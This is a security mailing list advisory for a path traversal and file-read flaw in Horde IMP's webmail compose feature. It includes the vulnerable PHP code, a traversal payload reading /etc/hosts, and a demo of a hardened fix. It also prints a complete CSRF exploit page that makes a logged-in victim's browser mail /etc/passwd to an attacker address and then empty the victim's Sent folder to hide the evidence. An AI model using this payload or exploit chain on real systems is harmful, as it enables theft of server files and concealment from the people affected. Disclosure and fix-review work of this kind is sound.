Full Disclosure mailing list archives
[fulldis] CVE-2026-58451 - Horde Groupware IMP path traversal vuln
From: ㅤevan via Fulldisclosure <fulldisclosure () seclists org>
Date: Fri, 3 Jul 2026 03:04:19 +1000
This is my first time sending to a mailing list, so I've chosen
something easy. Here goes:
Summary: Horde Groupware's IMP webmail component contains a path
traversal / local file inclusion vulnerability in its handling of HTML
messages being composed: the src of an <img> element is mapped to a
filesystem path by a plain prefix replacement, so "../" segments let any
file readable by the web server be read and attached to the outgoing
message. This could be exploited to escalate privileges or bypass
authentication, and through CSRF it is reachable by an unauthenticated
attacker who can get a logged-in user to load a page.
The vulnerable code, in IMP's handling of <img> tags in a composed HTML
message:
--
    } elseif (strcasecmp($node->tagName, 'IMG') === 0) {
        /* Check for smileys. They live in the JS directory, under
         * the base ckeditor directory, so search for that and replace
         * with the filesystem information if found (Request
         * #13051). Need to ignore other image links that may have
         * been explicitly added by the user. */
        $js_path = strval(Horde::url($registry->get('jsuri', 'horde'), true));
        if (stripos($src, $js_path . '/ckeditor') === 0) {
            $file = str_replace(
                $js_path,
                $registry->get('jsfs', 'horde'),
                $src
            );
            if (is_readable($file)) {
                $data_part = new Horde_Mime_Part();
                $data_part->setContents(file_get_contents($file));
    ...
--
As seen, $file is derived directly from $src, i.e. the src attribute of
an <img> we control: the only transformation is str_replace() swapping
the JS URL prefix ($js_path) for the filesystem path (jsfs), with no
realpath(), no rejection of "../" segments and no check that the result
stays under the ckeditor directory. The only gate in front of the
file_get_contents() sink is the stripos() prefix check, which is
satisfied by any src that starts with the instance's full JS URL (scheme
and host included, as Horde::url(..., true) builds it) followed by
/ckeditor; is_readable() merely limits us to files the web server user
can read. The file's contents are then attached to the message as a MIME
part, so mailing it to an address we control exfiltrates the file. Our
(elementary) exploit is thus:
--
<img src="https://webmail.foo.com/js/ckeditor/../../../../../../etc/hosts">
--
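As an added example (not IMP's or Horde's own code), the following stand-alone PHP script models the vulnerable src-to-path mapping from the snippet above next to a hardened version that canonicalises with realpath() and refuses anything that resolves outside the jsfs/ckeditor directory. $jsUri and $jsFs are stand-ins for the jsuri/jsfs registry values; the directory layout, file names and URLs are constructed for the demo and are not real Horde paths.

```php
<?php
declare(strict_types=1);

// Added example, not IMP's or Horde's own code. $jsUri / $jsFs stand in
// for Horde::url($registry->get('jsuri', 'horde'), true) and
// $registry->get('jsfs', 'horde'); all paths and URLs here are made up.

/** Vulnerable mapping from the IMP snippet: a bare prefix swap. */
function vulnerableResolve(string $src, string $jsUri, string $jsFs): ?string
{
    if (stripos($src, $jsUri . '/ckeditor') !== 0) {
        return null;                          // user-added image, ignored
    }
    $file = str_replace($jsUri, $jsFs, $src); // "../" segments survive
    return is_readable($file) ? $file : null;
}

/** Hardened mapping: canonicalise, then require containment in jsfs/ckeditor. */
function safeResolve(string $src, string $jsUri, string $jsFs): ?string
{
    $prefix = $jsUri . '/ckeditor/';
    if (stripos($src, $prefix) !== 0 || strpos($src, "\0") !== false) {
        return null;
    }
    $smileyDir = realpath($jsFs . '/ckeditor');
    $candidate = realpath($jsFs . '/ckeditor/' . substr($src, strlen($prefix)));
    if ($smileyDir === false || $candidate === false
        || strncmp($candidate, $smileyDir . DIRECTORY_SEPARATOR, strlen($smileyDir) + 1) !== 0) {
        return null;                          // resolved outside the smiley dir
    }
    return (is_file($candidate) && is_readable($candidate)) ? $candidate : null;
}

// Throw-away layout (constructed for the demo): one smiley plus a "secret"
// two levels above jsfs, standing in for /etc/passwd on a real box.
$root = sys_get_temp_dir() . '/imp-lfi-demo-' . getmypid();
mkdir("$root/js/ckeditor/smileys", 0700, true);
file_put_contents("$root/js/ckeditor/smileys/smile.gif", 'GIF89a');
file_put_contents("$root/secret.conf", "db_password=hunter2\n");

$jsUri = 'https://webmail.example.test/horde/js';   // hypothetical jsuri
$jsFs  = "$root/js";                                 // hypothetical jsfs

$cases = [
    'legit smiley' => $jsUri . '/ckeditor/smileys/smile.gif',
    'traversal'    => $jsUri . '/ckeditor/../../secret.conf',
];
foreach ($cases as $label => $src) {
    printf("%-13s stripos gate: %s | vulnerable -> %s | hardened -> %s\n",
        $label,
        stripos($src, $jsUri . '/ckeditor') === 0 ? 'passes' : 'blocks',
        vulnerableResolve($src, $jsUri, $jsFs) ?? 'null',
        safeResolve($src, $jsUri, $jsFs) ?? 'null');
}

// Clean up the demo tree.
unlink("$root/js/ckeditor/smileys/smile.gif");
unlink("$root/secret.conf");
foreach (["$root/js/ckeditor/smileys", "$root/js/ckeditor", "$root/js", $root] as $d) {
    rmdir($d);
}
```

Run it with php on the command line. The legitimate smiley resolves under both functions; the traversal URL passes the stripos() gate and resolves to the secret with the vulnerable mapping but is rejected by the hardened one. A containment check on the canonical path is the property to look for when reviewing the fix.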
The primitive is an arbitrary file read rather than code execution, but
it is likely very chainable with any other existing primitive to achieve
RCE on Horde IMP. For example, here is an easy CSRF chain: a page that
makes a logged-in victim's browser send /etc/passwd from the target
server to an attacker address via IMP's sendMessage AJAX endpoint, then
empties the victim's Sent folder to hide the trace:
--
<!DOCTYPE html>
<html>
<body>
<h1>yo</h1>
<script>
// Step 1: make the victim's browser (logged in to Horde on "targ") send
// an HTML message whose <img> src abuses the traversal. IMP attaches the
// referenced server file to the message, which goes to the attacker.
var p1 = new FormData();
p1.append('to', 'john@evil.gov');   // attacker-controlled mailbox
// land in spam
p1.append('subject', 'hai');
p1.append('html', '1');             // HTML message, so the IMG handler runs
p1.append('message',
  '<html><body>bye<img src="http://targ/horde/js/ckeditor/../../../../etc/passwd"></body></html>');
p1.append('identity', '0');
p1.append('priority', 'normal');
p1.append('request_read_receipt', '0');
p1.append('save_sent_mail', '1');
fetch('http://targ/horde/services/ajax.php/imp/sendMessage', {
  method: 'POST',
  body: p1,
  credentials: 'include',   // ride the victim's Horde session cookie
  mode: 'no-cors'           // opaque response is fine, we never read it
})
.then(() => {
  console.log("* bye");
  // Step 2: remove the evidence from the victim's Sent folder.
  setTimeout(() => {
    var p2 = new FormData();
    p2.append('mbox', 'U0VOVA'); // IMP's base64 mailbox id for "SENT" (unpadded)
    // delete
    fetch('http://targ/horde/services/ajax.php/imp/emptyMailbox', {
      method: 'POST',
      body: p2,
      credentials: 'include',
      mode: 'no-cors'
    });
  }, 2000);                  // give sendMessage time to finish first
});
</script>
</body>
</html>
--
PATCH:
Update to Horde IMP 7.0.1, which contains the fix.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
